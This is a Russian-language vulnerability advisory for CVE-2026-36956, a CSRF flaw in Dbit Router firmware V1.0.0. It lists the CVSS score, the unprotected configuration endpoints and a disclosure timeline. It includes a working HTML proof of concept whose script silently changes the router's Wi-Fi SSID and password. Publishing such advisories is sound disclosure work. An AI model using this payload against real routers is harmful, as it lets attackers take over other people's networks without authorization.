
Доказательство концепции для CVE-2026-36956, уязвимости CSRF в прошивке маршрутизатора Dbit, позволяющей несанкционированное изменение конфигурации с помощью поддельных запросов.
Идентификатор CVE: CVE-2026-36956 Дата: 2026-04-29 Исследователь: Kirubel Solomne Производитель: Shenzhen Dibit Network Equipment Co., Ltd. Продукт: Dbit Router Версия прошивки: V1.0.0 CWE: CWE-352 — Межсайтовая подделка запроса (CSRF)
Прошивка Dbit Router V1.0.0 не реализует механизмы защиты от CSRF, такие как анти-CSRF токены или строгую проверку заголовков Origin/Referer на административных API-эндпоинтах. Злоумышленник может создать вредоносную веб-страницу, которая отправляет поддельные HTTP-запросы к эндпоинтам конфигурации. Если авторизованный администратор посетит вредоносную страницу, маршрутизатор обработает поддельный запрос как легитимное административное действие.
Оценка CVSS v3.1: 8.8 (Высокая)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Метрика | Значение |
|---|
| Вектор атаки | Сетевой |
| Сложность атаки | Низкая |
| Требуемые привилегии | Отсутствуют |
| Взаимодействие с пользователем | Требуется |
| Влияние на конфиденциальность | Высокое |
| Влияние на целостность | Высокое |
| Влияние на доступность | Высокое |
| Эндпоинт | Функция |
|---|---|
/api/setWlan | Конфигурация беспроводной сети (SSID, пароль) |
/api/setWan | Конфигурация WAN |
/api/setSystem | Конфигурация системы |
Сохраните следующий код как poc.html и откройте его, пока администратор вошёл в маршрутизатор:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Ожидаемое поведение: Запрос должен быть отклонён из-за несовпадения CSRF-токена. Фактическое поведение: Маршрутизатор принимает и обрабатывает поддельный запрос.
| Дата | Событие |
|---|---|
| 2026-04-29 | Уязвимость обнаружена |
| 2026-04-29 | Сообщено в MITRE |
| 2026-04-29 | Присвоен CVE-2026-36956 |
| 2026-04-29 | Публичное раскрытие |